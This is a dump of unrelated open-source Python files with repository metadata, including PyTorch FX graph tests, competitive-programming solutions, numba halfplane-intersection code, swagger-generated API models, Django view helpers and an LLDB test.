to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = to_inline.graph.nodes[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with torch.fx.graph.insert_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
    def test_reassign_args_kwargs_uses(self):
        """Reassigning `Node.args` must keep use-def (users) info in sync."""
        graph = torch.fx.Graph()
        x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
        z = x + y
        zed = z + z + z
        graph.output(zed.node)
        graph.lint()
        # zed = z + z + z -> zed = z + z + x
        zed.node.args = (zed.node.args[0], x.node)
        # x is now used both by z (x + y) and directly by zed.
        self.assertEqual(x.node.users.keys(), [z.node, zed.node])
        # z = x + y -> z = y + y
        z.node.args = (y.node, y.node)
        # z no longer consumes x; only zed does.
        self.assertEqual(x.node.users.keys(), [zed.node])
# Entry point when executed directly: run the PyTorch test harness.
if __name__ == '__main__':
    run_tests()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
8b911d329c8bec2537e8276d843ea45bea74e467 | ef187d259d33e97c7b9ed07dfbf065cec3e41f59 | /work/atcoder/abc/abc023/C/answers/112335_Gale.py | 931904830969cd7b6dfccc1f26e1805b2573aa71 | [] | no_license | kjnh10/pcw | 847f7295ea3174490485ffe14ce4cdea0931c032 | 8f677701bce15517fb9362cc5b596644da62dca8 | refs/heads/master | 2020-03-18T09:54:23.442772 | 2018-07-19T00:26:09 | 2018-07-19T00:26:09 | 134,586,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | ame = set()
# Count cells (row, col) whose row drop count + column drop count equals k,
# then correct for cells that themselves contain a drop: such a cell's own
# drop is tallied in both its row and its column.  (`ame` — the set of drop
# coordinates — is initialized just above this block.)
r, c, k = map(int, input().split())
row_n = [0] * (r + 1)    # row_n[i]  = number of drops in row i
col_n = [0] * (c + 1)    # col_n[j]  = number of drops in column j
row_nn = [0] * 100001    # row_nn[d] = number of rows with exactly d drops
col_nn = [0] * 100001    # col_nn[d] = number of columns with exactly d drops
n = int(input())
for _ in range(n):
    rr, cc = map(int, input().split())
    row_n[rr] += 1
    col_n[cc] += 1
    ame.add((rr, cc))
for i in range(1, r + 1):
    row_nn[row_n[i]] += 1
for i in range(1, c + 1):
    col_nn[col_n[i]] += 1
ans = 0
# For each split i + (k - i) = k, every (row with i drops, col with k-i drops)
# pair contributes one candidate cell.
for i in range(k + 1):
    ans += row_nn[i] * col_nn[k - i]
# A cell holding a drop has its own drop double-counted: row + col sums to
# k means its true total is k - 1 (remove it); a sum of k + 1 means the true
# total is k (add it).
for rr, cc in ame:
    num = row_n[rr] + col_n[cc]
    if num == k:
        ans -= 1
    if num == k + 1:
        ans += 1
print(ans)
| [
"kojinho10@gmail.com"
] | kojinho10@gmail.com |
87e43a21fec53e30d2d5f8bebe82dd4feb5829bd | 32c4a3f8893a7fe9039ebfb2d98215e06203f8f2 | /tests/tensor/coordinate/system/axis/test__axis.py | c8aad570b9de1b5b0b45762a0dd50d4202c819ce | [
"Apache-2.0"
] | permissive | jedhsu/tensor | d27c8951aa32208e3c5bbcef0d0f2bae56f8a670 | 3b2fe21029fa7c50b034190e77d79d1a94ea5e8f | refs/heads/main | 2023-07-06T11:35:36.307538 | 2021-08-07T20:11:19 | 2021-08-07T20:11:19 | 366,904,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | """
*Axis, [Unit Tests]*
"""
from tensor.tensor.coordinate.system.axis._axis import Axis
class TestAxis:
    """Unit tests for the Axis value object."""

    def test_init(self):
        """Direct construction stores ordinal, origin and direction."""
        axis = Axis(5, 0, 1)
        assert isinstance(axis, Axis)
        assert axis.ordinal == 5
        assert axis.origin == 0
        assert axis.direction == 1

    def test_create(self):
        """The `create` factory defaults origin to 0 and direction to 1."""
        axis = Axis.create(5)
        assert axis.origin == 0
        assert axis.direction == 1
| [
"jed910@gmail.com"
] | jed910@gmail.com |
ca35767c9da032c4f339de5aa5a46487243fc984 | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/compat/__init__.pyi | 3d2128b4dcb1f4be3619e7a503336c8e387ce6bb | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 803 | pyi | # Stubs for pandas.compat (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level,line-too-long,arguments-differ
# pylint: disable=no-member,too-few-public-methods,keyword-arg-before-vararg
# pylint: disable=super-init-not-called,abstract-method,redefined-builtin
from typing import Any
PY36: Any
PY37: Any
PYPY: Any
def set_function_name(f: Any, name: Any, cls: Any) -> Any:
    """Stub: bind `name` (in the context of `cls`) onto function `f`."""
    ...
def raise_with_traceback(exc: Any, traceback: Any = ...) -> None:
    """Stub: raise `exc` with the given (or current) traceback attached."""
    ...
def is_platform_little_endian():
    """Stub: True when the interpreter runs on a little-endian machine."""
    ...
def is_platform_windows():
    """Stub: True when running on Windows."""
    ...
def is_platform_linux():
    """Stub: True when running on Linux."""
    ...
def is_platform_mac():
    """Stub: True when running on macOS."""
    ...
def is_platform_32bit():
    """Stub: True when running on a 32-bit interpreter."""
    ...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
50610a3f906a7a87156de10f1d4f14ee940cbcb2 | d532b85841b459c61d88d380e88dd08d29836d43 | /solutions/959_regions_cut_by_slashes.py | b72a08453f9c8c421f6efe61aa9d4386f67a0fa4 | [
"MIT"
] | permissive | YiqunPeng/leetcode_pro | ad942468df5506de9dc48a4019933f658e2a3121 | 4a508a982b125a3a90ea893ae70863df7c99cc70 | refs/heads/master | 2022-05-15T09:32:02.699180 | 2022-05-14T16:32:17 | 2022-05-14T16:32:17 | 182,453,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,711 | py | class Solution:
def regionsBySlashes(self, grid: List[str]) -> int:
n = len(grid)
seen = set()
res = 0
for i in range(n):
for j in range(n):
if (i, j, 0) not in seen:
self._dfs(grid, i, j, 0, seen)
res += 1
if (i, j, 1) not in seen:
self._dfs(grid, i, j, 1, seen)
res += 1
return res
    def _dfs(self, grid, i, j, a, seen):
        """Flood-fill one triangular half of cell (i, j).

        Each cell is split along a diagonal into two halves addressed by
        `a`.  From the connections below: for '/' part 0 is the upper-left
        triangle and part 1 the lower-right; for '\\' part 0 is the
        lower-left and part 1 the upper-right; a blank cell simply merges
        its two halves.  Across cell edges, the left neighbour always
        exposes its part 1 and the right neighbour its part 0, while the
        part exposed vertically depends on the neighbour's own character
        ('/' or ' ' vs '\\').
        """
        if (i, j, a) in seen:
            return
        n = len(grid)
        seen.add((i, j, a))
        if grid[i][j] == ' ':
            # Blank cell: the two halves connect to each other, and each
            # half also connects to the adjacent cells it touches.
            if a == 0:
                self._dfs(grid, i, j, 1, seen)
                if i > 0:
                    if grid[i-1][j] in [' ', '/']:
                        self._dfs(grid, i-1, j, 1, seen)
                    else:
                        self._dfs(grid, i-1, j, 0, seen)
                if j > 0:
                    self._dfs(grid, i, j-1, 1, seen)
            else:
                self._dfs(grid, i, j, 0, seen)
                if j + 1 < n:
                    self._dfs(grid, i, j+1, 0, seen)
                if i + 1 < n:
                    if grid[i+1][j] in ['/', ' ']:
                        self._dfs(grid, i+1, j, 0, seen)
                    else:
                        self._dfs(grid, i+1, j, 1, seen)
        elif grid[i][j] == '\\':
            # '\\' cell: part 0 touches the left and bottom edges,
            # part 1 touches the right and top edges.
            if a == 0:
                if j > 0:
                    self._dfs(grid, i, j-1, 1, seen)
                if i + 1 < n:
                    if grid[i+1][j] in ['/', ' ']:
                        self._dfs(grid, i+1, j, 0, seen)
                    else:
                        self._dfs(grid, i+1, j, 1, seen)
            else:
                if j + 1 < n:
                    self._dfs(grid, i, j+1, 0, seen)
                if i > 0:
                    if grid[i-1][j] in [' ', '/']:
                        self._dfs(grid, i-1, j, 1, seen)
                    else:
                        self._dfs(grid, i-1, j, 0, seen)
        else:
            # '/' cell: part 0 touches the top and left edges,
            # part 1 touches the bottom and right edges.
            if a == 0:
                if i > 0:
                    if grid[i-1][j] in [' ', '/']:
                        self._dfs(grid, i-1, j, 1, seen)
                    else:
                        self._dfs(grid, i-1, j, 0, seen)
                if j > 0:
                    self._dfs(grid, i, j-1, 1, seen)
            else:
                if j + 1 < n:
                    self._dfs(grid, i, j+1, 0, seen)
                if i + 1 < n:
                    if grid[i+1][j] in ['/', ' ']:
                        self._dfs(grid, i+1, j, 0, seen)
                    else:
                        self._dfs(grid, i+1, j, 1, seen)
| [
"ypeng1@andrew.cmu.edu"
] | ypeng1@andrew.cmu.edu |
df50b05cf5f33bf54acad8204d9968987e7e4ba3 | d51b8b1b55bbcdea55d6ab2b0a97c03cd290868d | /revivalkit/log.py | b03be3472a8d2de8da12f422fc34225da06ed095 | [] | no_license | gogobook/revivalkit | 2c48f9a032b159589a1e8f5b515a22b7fc4e0123 | 3f1eccc6bd80a2c0c4ad7ab60491c98a8d9cd632 | refs/heads/master | 2021-01-16T18:07:53.065671 | 2015-12-12T07:40:32 | 2015-12-12T07:40:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from __future__ import print_function
import sys
to_print_debug = False  # module-level switch; flip to True to see debug output
def debug(*args, **arg_ds):
    """Print a 'revivalkit:debug:' line to stderr when debugging is enabled."""
    if to_print_debug:
        print('revivalkit:debug:', *args, file=sys.stderr, **arg_ds)
| [
"mosky.tw@gmail.com"
] | mosky.tw@gmail.com |
1ca5712af3da706bb53d3661f958c30321305c1f | 2fe58e7f6bfc3efdb78ca56f72a4e2a75a24c270 | /eric/eric6/Plugins/__init__.py | fe0b347045e010e41b7ae1988a28bc90b6118bc1 | [] | no_license | testerclub/eric6-20.3 | 3053e0e6962060b213f5df329ee331a4893d18e6 | bba0b9f13fa3eb84938422732d751219bc3e29e2 | refs/heads/master | 2023-03-18T08:24:03.472297 | 2020-03-14T06:44:14 | 2020-03-14T06:44:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2007 - 2020 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Package containing all core plugins.
"""
| [
"skeptycal@gmail.com"
] | skeptycal@gmail.com |
fe6f4c64becb61733511e9dd29f3fa33cfdeb957 | aa13e1d93b7a8017e1e610a900bd05f6df91604f | /hackerrank/contests/hourrank7/array-splitting.py | 3e61e19ff22b66ac69f49c320ebb26f4cad2c1db | [] | no_license | laveesingh/Competitive-Programming | 3ce3272eab525635f9ce400f7467ee09de8b51df | 41047f47c23bc8572a1891e891a03cc3f751e588 | refs/heads/master | 2021-01-24T09:51:00.332543 | 2017-10-30T17:11:48 | 2017-10-30T17:11:48 | 52,956,650 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | from pprint import pprint
ans = 0
# dict[tuple] = (divided tuple of list), value
def isPos(a, n):
    """Return (prefix, suffix, n + 1) if `a` splits into two parts with
    equal sums, otherwise False (Python 2: uses xrange).

    `s` accumulates the prefix sum while `s2` holds the remaining suffix
    sum, so each split point is tested in O(1).
    """
    s = 0
    s2 = sum(a)
    for i in xrange(len(a)-1):
        s += a[i]
        s2 -= a[i]
        # NOTE: i never reaches len(a)-1 inside this loop, so the second
        # condition is always true (redundant).
        if s == s2 and i != len(a)-1:
            return (a[:i+1],a[i+1:], n+1)
    return False
store = {}  # maps tuple(sub-array) -> (left part, right part, depth reached)
def solve(a, n):
    """Recursively split `a` wherever an equal-sum split exists, recording
    each successful split (with its depth) in the global `store`."""
    x = isPos(a, n)
    if x:
        store[tuple(a)] = x
        a1 = x[0]
        a2 = x[1]
        solve(a1, n+1)
        solve(a2, n+1)
# For each test case (Python 2 I/O): read the array, explore all equal-sum
# splits via solve(), and report the maximum split depth reached.
for _ in xrange(input()):
    n = input()
    a = map(int, raw_input().split())
    store = {}
    solve(a, 0)
    ans = 0
    for s in store:
        if store[s][2] > ans:
            ans = store[s][2]
    print ans
# def case():
# n = random.randint(1,9)
# print n
# for _ in xrange(n):
# l = random.randint(1,20)
# a = [random.randint(1,8) for i in xrange(l)]
# print l
# for s in a: print s,
# print | [
"laveechaudharytheone@gmail.com"
] | laveechaudharytheone@gmail.com |
0be8c0f0c2fd334cf4240d98ea194ea813adee91 | 2387caf918fa9109568f3f804377c409f7b40fe8 | /distance3d/hydroelastic_contact/_halfplanes.py | d43f8b1483633f57ef2fec53122454584ef197c4 | [
"Zlib",
"MIT",
"BSD-3-Clause",
"BSD-3-Clause-Clear",
"BSL-1.0",
"Unlicense"
] | permissive | AlexanderFabisch/distance3d | aed80c3c4f556f832a44c3b674760db20ef92f2d | 7b2098161a57253c68d3725d63ea235831d272eb | refs/heads/master | 2023-08-19T06:56:30.725164 | 2023-08-03T16:08:51 | 2023-08-03T16:08:51 | 476,051,225 | 30 | 5 | NOASSERTION | 2023-07-28T08:07:23 | 2022-03-30T21:05:48 | Python | UTF-8 | Python | false | false | 3,624 | py | import numba
import numpy as np
from ..utils import norm_vector, EPSILON
# replaces from numba.np.extensions import cross2d, which seems to have a bug
# when called with NUMBA_DISABLE_JIT=1
@numba.njit(
    numba.float64(numba.float64[::1], numba.float64[::1]),
    cache=True)
def cross2d(a, b):
    """Return the 2D cross product (z-component) of vectors `a` and `b`."""
    return a[0] * b[1] - a[1] * b[0]
@numba.njit(
    numba.float64[::1](numba.float64[::1], numba.float64[::1]),
    cache=True)
def intersect_two_halfplanes(halfplane1, halfplane2):
    """Intersect the boundary lines of two halfplanes.

    Each halfplane is a 4-vector (px, py, dx, dy): a point and a direction.
    Returns the intersection point of the two boundary lines, or an empty
    array when the directions are (near-)parallel.
    """
    denom = cross2d(halfplane1[2:], halfplane2[2:])
    if abs(denom) < EPSILON:
        return np.empty(0, dtype=np.dtype("float"))
    t = cross2d((halfplane2[:2] - halfplane1[:2]), halfplane2[2:]) / denom
    return halfplane1[:2] + halfplane1[2:] * t
@numba.njit(
    numba.bool_(numba.float64[::1], numba.float64[::1]),
    cache=True)
def point_outside_of_halfplane(halfplane, point):
    """True if `point` lies strictly outside `halfplane` (negative cross
    product, i.e. to the right of the direction vector)."""
    return cross2d(halfplane[2:], point - halfplane[:2]) < -EPSILON
@numba.njit(
    numba.float64[:, :](numba.float64[:, ::1]), cache=True)
def intersect_halfplanes(halfplanes):
    """Find polygon points by halfplane intersection.

    Parameters
    ----------
    halfplanes : array, shape (n_halfplanes, 4)
        Halfplanes in contact plane. Each halfplane is defined by a point
        p and a direction pq.

    Returns
    -------
    points : array, shape (n_points, 2)
        Pairwise boundary intersections that lie inside every halfplane
        (polygon vertices; unordered, duplicates possible).
    """
    # reserve more space than required, there might be duplicates
    points = np.empty((3 * len(halfplanes), 2))
    n_intersections = 0
    for i in range(len(halfplanes)):
        for j in range(i + 1, len(halfplanes)):
            p = intersect_two_halfplanes(halfplanes[i], halfplanes[j])
            if len(p) == 0:  # parallel halfplanes
                continue
            # keep p only if no *other* halfplane excludes it
            valid = True
            for k in range(len(halfplanes)):
                if k != i and k != j and point_outside_of_halfplane(
                        halfplanes[k], p):
                    valid = False
                    break
            if valid:
                points[n_intersections] = p
                n_intersections += 1
    assert n_intersections < len(points)
    return points[:n_intersections]
def plot_halfplanes_and_intersections(halfplanes, points=None, xlim=None, ylim=None):  # pragma: no cover
    """Debug helper: draw halfplanes and (optionally) intersection points."""
    import matplotlib.pyplot as plt
    if points is None:
        scale = 1.0
    else:
        # scale the drawing to the spread of the intersection points
        center = np.mean(points, axis=0)
        max_distance = max(np.linalg.norm(points - center, axis=1))
        scale = 10.0 * max_distance
    plt.figure()
    ax = plt.subplot(111, aspect="equal")
    for i, halfplane in enumerate(halfplanes):
        # first half of the halfplanes red, the rest blue
        c = "r" if i < len(halfplanes) // 2 else "b"
        plot_halfplane(halfplane, ax, c, 0.5, scale)
    if points is not None:
        # give the first few points distinct colors, the remainder black
        colors = ["r", "g", "b", "orange", "magenta", "brown", "k"][:len(points)]
        if len(colors) < len(points):
            colors.extend(["k"] * (len(points) - len(colors)))
        plt.scatter(points[:, 0], points[:, 1], c=colors, s=100)
    if xlim is not None:
        plt.xlim(xlim)
    if ylim is not None:
        plt.ylim(ylim)
    plt.show()
def plot_halfplane(halfplane, ax, c, alpha, scale):  # pragma: no cover
    """Draw one halfplane: its boundary line plus short normal ticks."""
    line = (halfplane[:2] + np.linspace(-scale, scale, 101)[:, np.newaxis]
            * norm_vector(halfplane[2:]))
    ax.plot(line[:, 0], line[:, 1], lw=3, c=c, alpha=alpha)
    # perpendicular of the 2D direction vector (dx, dy) -> (-dy, dx)
    normal2d = np.array([-halfplane[3], halfplane[2]])
    for p in line[::10]:
        normal = (p + np.linspace(0.0, 0.1 * scale, 101)[:, np.newaxis]
                  * norm_vector(normal2d))
        ax.plot(normal[:, 0], normal[:, 1], c=c, alpha=0.5 * alpha)
| [
"afabisch@googlemail.com"
] | afabisch@googlemail.com |
f6f0da799baa0c953facd5a352662624b46d44c9 | f9e1d9c71d232aa0bcf03627259e6c9f88538b18 | /gs108ExtraMethodsOfClassBasedView/gs108/asgi.py | 2cd325422ba75b65fd77dbbeaf2e0635a1336874 | [] | no_license | nayan-gujju/Django-Practice | a7db202b6a3627a6a4e9f96953b61e43eaf68cb1 | eafa29e9321a1683867b2ea1d26ca74dfa6db12d | refs/heads/master | 2023-07-27T11:41:43.956705 | 2021-09-09T08:47:44 | 2021-09-09T08:47:44 | 403,917,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
ASGI config for gs108 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at this project's settings module before building the ASGI app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs108.settings')
application = get_asgi_application()
| [
"nayangujarati007@gmail.com"
] | nayangujarati007@gmail.com |
7947c7a7858c6399fa83aeee2c2115a32a62c5f5 | c6e5d5ff2ee796fd42d7895edd86a49144998067 | /platform/polycommon/polycommon/live_state.py | 2f5680bf039683418e6233de246bbf5e217f1810 | [
"Apache-2.0"
] | permissive | zeyaddeeb/polyaxon | f4481059f93d8b70fb3d41840a244cd9aaa871e0 | 1f2b236f3ef36cf2aec4ad9ec78520dcc9ef4ee5 | refs/heads/master | 2023-01-19T05:15:34.334784 | 2020-11-27T17:08:35 | 2020-11-27T17:08:35 | 297,410,504 | 0 | 0 | Apache-2.0 | 2020-09-21T17:20:27 | 2020-09-21T17:20:26 | null | UTF-8 | Python | false | false | 198 | py | STATE_LIVE = 1
STATE_ARCHIVED = 0
STATE_DELETION_PROGRESSING = -1
# (value, label) pairs mapping each state constant to its string name;
# STATE_LIVE (= 1) is defined just above this block.
CHOICES = (
    (STATE_LIVE, "live"),
    (STATE_ARCHIVED, "archived"),
    (STATE_DELETION_PROGRESSING, "deletion_progressing"),
)
| [
"contact@polyaxon.com"
] | contact@polyaxon.com |
55a04939f3799c5645a196ee9769032e5a0efd68 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_21/models/local_group_membership_post.py | fcc7518cae6098afbd8512b4e37e409abe4850f1 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,982 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_21 import models
class LocalGroupMembershipPost(object):
    """
    Swagger-generated request model with a single optional `members` field.

    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'members': 'list[LocalgroupmembershippostMembers]'
    }
    attribute_map = {
        'members': 'members'
    }
    required_args = {
    }
    def __init__(
        self,
        members=None, # type: List[models.LocalgroupmembershippostMembers]
    ):
        """
        Keyword args:
            members (list[LocalgroupmembershippostMembers]): A list of resources to be a member of the group.
        """
        if members is not None:
            self.members = members
    # Reject assignment to anything that is not a declared swagger property.
    def __setattr__(self, key, value):
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
        self.__dict__[key] = value
    # Hide unset Property placeholders: reading one raises AttributeError
    # as if the attribute were absent.
    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value
    # Mapping-style access, restricted to declared properties.
    def __getitem__(self, key):
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
        return object.__getattribute__(self, key)
    def __setitem__(self, key, value):
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
        object.__setattr__(self, key, value)
    def __delitem__(self, key):
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `LocalGroupMembershipPost`".format(key))
        object.__delattr__(self, key)
    def keys(self):
        return self.attribute_map.keys()
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models (anything with to_dict) inside
        # lists, dicts, or direct attributes.
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        # Generated defensive branch: only relevant if the model ever
        # subclasses dict (it does not here).
        if issubclass(LocalGroupMembershipPost, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, LocalGroupMembershipPost):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"noreply@github.com"
] | PureStorage-OpenConnect.noreply@github.com |
1e6853ac04cd59b0da08c492ad82eb7292a0b5e7 | 455706c02fb0a5dfcb29572779c2dde34ecb3c1c | /django_oopviews/base.py | 6f018dc6ed93cbd70df1ae51cd6070e7aca285df | [
"BSD-3-Clause"
] | permissive | zerok/django-oopviews | 581293aaab673559186e2e570f37bc4eea8d39ea | 8b80cae437b6089310ae12dd76532624c84db18b | refs/heads/master | 2016-09-05T13:16:34.013936 | 2008-11-11T00:46:35 | 2008-11-11T00:46:35 | 57,663 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,776 | py | """
In some instances you end up producing tons of views that actually do mostly
the same except for perhaps one or two lines. This module offers you a simple
alternative::
from django_oopviews import create_view, BaseView
class View1(BaseView):
def __init__(self, request, *args, **kwargs):
# Here you have your common code
self.my_variable = 1
def __call__(self, request, *args, **kwargs):
whatever = self.my_variable + 1
return HttpResponse(whatever)
class View2(View1):
def __call__(self, request, *args, **kwargs):
return HttpResponse(self.my_variable)
view1 = create_view(View1)
view2 = create_view(View2)
In this example, the code in ``View1.__init__`` is shared between View1 and
View2, so you don't need to write it again.
If you want to share some HttpResponse post-processing, implement the
``BaseView.__after__(self, response_obj)`` method
For more details check out this `blog post`_
.. _blog post: http://zerokspot.com/weblog/1037/
"""
# Public API of this module.
__all__ = ('create_view', 'BaseView', )
def create_view(klass):
    """
    Turn an OOP view class into a plain view function for a urlconf.

    The returned function instantiates `klass` once per request, calls the
    instance to produce a response and, when the class defines an
    `__after__` hook, passes the response through it.  The class is kept
    reachable on the function as `_class`.
    """
    def view_function(request, *args, **kwargs):
        """Per-request wrapper: instantiate the view, call it, post-process."""
        instance = klass(request, *args, **kwargs)
        response = instance(request, *args, **kwargs)
        post_process = getattr(instance, '__after__', None)
        if post_process is not None:
            response = post_process(response)
        return response
    view_function._class = klass
    return view_function
class BaseView(object):
    """
    The Base-class for OOPViews. Inherit it and overwrite the __init__,
    __call__ and/or __after__ methods.
    """
    def __init__(self, request, *args, **kwargs):
        """
        In the constructor you can easily aggregate common functionality.
        """
        pass
    def __call__(self, request, *args, **kwargs):
        """
        This is the method where you want to put the part of your code, that
        is absolutely view-specific.  Subclasses must override it.

        Raises:
            RuntimeError: always, when not overridden.
        """
        # Python-3-compatible raise: the original used the Python-2-only
        # statement form ``raise RuntimeError, "msg"``, which is a
        # SyntaxError on Python 3.  The call form is identical on both.
        raise RuntimeError("You have to override BaseView's __call__ method")
    def __after__(self, response):
        """
        If you want to share some response processing between multiple views
        without using a middleware and filter the affected views there,
        this method is for you.  The default implementation returns the
        response unchanged.
        """
        return response
| [
"zerok@zerokspot.com"
] | zerok@zerokspot.com |
67ceade67a7d9a435d33fe714ae6051a373d2f92 | e86dedc5b0bb79b9eba41e74c343e77bd1ee1512 | /lldb/test/API/commands/expression/import-std-module/sysroot/TestStdModuleSysroot.py | 014a35458d66fa1a5fc78a34595ca0b20de85127 | [
"NCSA",
"LLVM-exception",
"Apache-2.0"
] | permissive | shafik/llvm-project | a5e1b66fb053f9aa01720a40ea7985b4cc57d16f | be556c838de06c3c2f69bf594996cace6ffa17eb | refs/heads/main | 2023-05-28T22:35:12.937142 | 2023-05-16T18:22:53 | 2023-05-16T18:25:41 | 221,325,771 | 0 | 0 | Apache-2.0 | 2019-11-12T22:40:44 | 2019-11-12T22:40:44 | null | UTF-8 | Python | false | false | 1,493 | py | """
Test that we respect the sysroot when building the std module.
"""
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
import os
class ImportStdModule(TestBase):
    # We only emulate a fake libc++ in this test and don't use the real libc++,
    # but we still add the libc++ category so that this test is only run in
    # test configurations where libc++ is actually supposed to be tested.
    @add_test_categories(["libc++"])
    @skipIf(compiler=no_match("clang"))
    @skipIfRemote # This test messes with the platform, can't be run remotely.
    def test(self):
        """Break in main.cpp, point the selected platform at the fake
        sysroot under ./root, and verify that `import-std-module`
        expressions resolve against that sysroot's std module."""
        self.build()
        sysroot = os.path.join(os.getcwd(), "root")
        # Set the sysroot.
        self.runCmd("platform select --sysroot '" + sysroot + "' host",
                    CURRENT_EXECUTABLE_SET)
        lldbutil.run_to_source_breakpoint(self,
                                          "// Set break point at this line.",
                                          lldb.SBFileSpec("main.cpp"))
        self.runCmd("settings set target.import-std-module true")
        # Call our custom function in our sysroot std module.
        # If this gives us the correct result, then we used the sysroot.
        # We rely on the default argument of -123 to make sure we actually have the C++ module.
        # (We don't have default arguments in the debug information).
        self.expect("expr std::myabs()", substrs=['(int) $0 = 123'])
| [
"teemperor@gmail.com"
] | teemperor@gmail.com |
6a3c75482f7f16ad0223ab79c872be430da13d6f | cdaeb2c9bbb949b817f9139db2d18120c70f1694 | /rakam_client/models/error_message.py | db883d4928c04f945e167febf9fbc9a5b5a2119b | [
"Apache-2.0"
] | permissive | sreekanthpulagam/rakam-python-client | 665c984ac7a29b57ead6feaeb99a69ba345220e6 | 8bd843208b03726d6ce89ee343b48b889b576e0e | refs/heads/master | 2021-01-24T15:42:36.374366 | 2016-07-19T21:49:26 | 2016-07-19T21:49:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,002 | py | # coding: utf-8
"""
Rakam API Documentation
An analytics platform API that lets you create your own analytics services.
OpenAPI spec version: 0.5
Contact: contact@rakam.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class ErrorMessage(object):
    """
    Swagger-generated model holding an error string and numeric code.

    NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
